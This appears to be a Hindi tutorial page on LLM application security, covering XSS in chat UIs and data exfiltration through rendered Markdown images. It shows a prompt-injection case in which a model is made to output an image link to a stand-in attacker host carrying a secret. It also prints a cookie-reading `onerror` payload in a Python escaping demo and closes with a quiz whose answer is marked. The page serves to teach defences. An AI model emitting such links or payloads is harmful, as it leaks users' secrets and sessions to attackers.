# Cross-Site Scripting और Markdown/Link Exfiltration — LLM Application Security

Source: https://www.geekswithgeeks.com/hi/llm-security/o-xss

> Browser में मॉडल पाठ escape करें और images व links से डेटा लीक होने पर नज़र रखें।

## Rendering हमले की सतह है

यदि chat UI मॉडल आउटपुट को कच्चे HTML के रूप में डालता है, तो `<img onerror=...>` या `<script>` tag वाला उत्तर user के browser में चलता है और sessions चुरा सकता है। पृष्ठ में डालने से पहले आउटपुट **escape** करें (या ऐसे सुरक्षित Markdown renderer से render करें जो कच्चा HTML बंद करे) और सख़्त **Content Security Policy** लगाएँ। सूक्ष्म हमला **Markdown images या links** उपयोग करता है: injected निर्देश मॉडल से `![x](https://attacker.test/log?data=SECRET)` आउटपुट करवाता है; chat UI image render करे तो browser वह URL fetch करता है और **secret हमलावर को भेज देता है** बिना किसी क्लिक के। बचाव: अविश्वसनीय domains की images या links स्वतः render न करें (image hosts की allow-list), मॉडल आउटपुट में query strings वाले URLs हटाएँ या बदलें, और link अनुसरित होने से पहले user को link पाठ दिखाएँ।

## Render से पहले उत्तर escape करना, चलाकर

मैंने यह सादे Python 3 (सिर्फ़ standard library) से चलाया। यहाँ सारे हमले स्थानीय डेटा पर हानिरहित प्रदर्शन हैं, कोई असली system उपयोग नहीं हुआ। कच्चे उत्तर में `<img onerror=...>` element है जो browser में चलता। `html.escape` के बाद angle brackets और quotes entities बन जाते हैं, इसलिए browser उसे चलाने की जगह पाठ दिखाता है।

```python
import html

model_output = 'Thanks! <img src=x onerror="alert(document.cookie)"> Your order has shipped.'
print("raw into a page   :", model_output)
print("escaped for a page:", html.escape(model_output))

```

Output:

```
raw into a page   : Thanks! <img src=x onerror="alert(document.cookie)"> Your order has shipped.
escaped for a page: Thanks! &lt;img src=x onerror=&quot;alert(document.cookie)&quot;&gt; Your order has shipped.
```

## Content Security Policy लगाएँ

Escaping में चूक निकल जाए तो सख़्त CSP दूसरी रक्षा-पंक्ति है।

**Quiz:** Render हुई Markdown image डेटा कैसे लीक कर सकती है?

- [ ] ऐसा नहीं हो सकता
- [ ] Images में हमेशा virus होते हैं
- [ ] Images मॉडल weights बदलती हैं
- [x] Browser image URL fetch करता है, और URL ख़ुद हमलावर को secret ले जा सकता है

*Answer:* Browser image URL fetch करता है, और URL ख़ुद हमलावर को secret ले जा सकता है. क्लिक की ज़रूरत नहीं: rendering ही अनुरोध भेज देती है।
